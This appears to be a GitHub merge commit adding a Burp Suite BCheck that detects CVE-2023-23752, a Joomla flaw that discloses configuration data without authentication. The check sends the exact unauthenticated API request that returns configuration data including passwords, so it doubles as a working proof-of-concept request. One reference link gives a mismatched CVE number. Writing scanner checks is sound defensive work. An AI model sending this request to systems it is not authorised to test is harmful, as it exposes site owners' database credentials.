Merge pull request #179 from sniperax/dev

CVE-2023-23752 Joomla! Webservice - Users,Passwords information disclosure
PortSwigger · Feb 29, 2024 · a393f69 · a393f69
2 parents 925fbeb + 885c051
commit a393f69
Showing 1 changed file with 33 additions and 0 deletions.
diff --git a/vulnerabilities-CVEd/CVE-2023-23752-Joomla-information-disclosure.bcheck b/vulnerabilities-CVEd/CVE-2023-23752-Joomla-information-disclosure.bcheck
@@ -0,0 +1,33 @@
+#https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
+#https://nvd.nist.gov/vuln/detail/CVE-2023-23552
+
+metadata:
+    language: v1-beta
+    name: "CVE-2023-23752 Unauthenticated information disclosure"
+    description: "Check for CVE-2023-23752"
+    author: "sniperax"
+    tags: "CVE-2023-23752","joomla","unauth","information","disclosure"
+
+define:
+    base_path = "/"
+    potential_path = "/api/index.php/v1/config/application?public=true"
+
+given host then
+    send request called check1:
+        method: "GET"
+        path: {base_path}
+
+    if "joomla-" in {check1.response.body} then
+        send request called check2:
+            method: "GET"
+            path: {potential_path}
+
+        if {check2.response.status_code} is "200" and "\"type\":\"application\"" in {check2.response.body} and "\"password\":" in {check2.response.body} then
+            report issue:
+            severity: high
+            confidence: firm
+            detail: "Title: Joomla! < 4.2.8 - Unauthenticated information disclosure"
+            remediation: "Upgrade to the latest version of Joomla or upgrade to version > 4.2.8"
+        end if
+
+    end if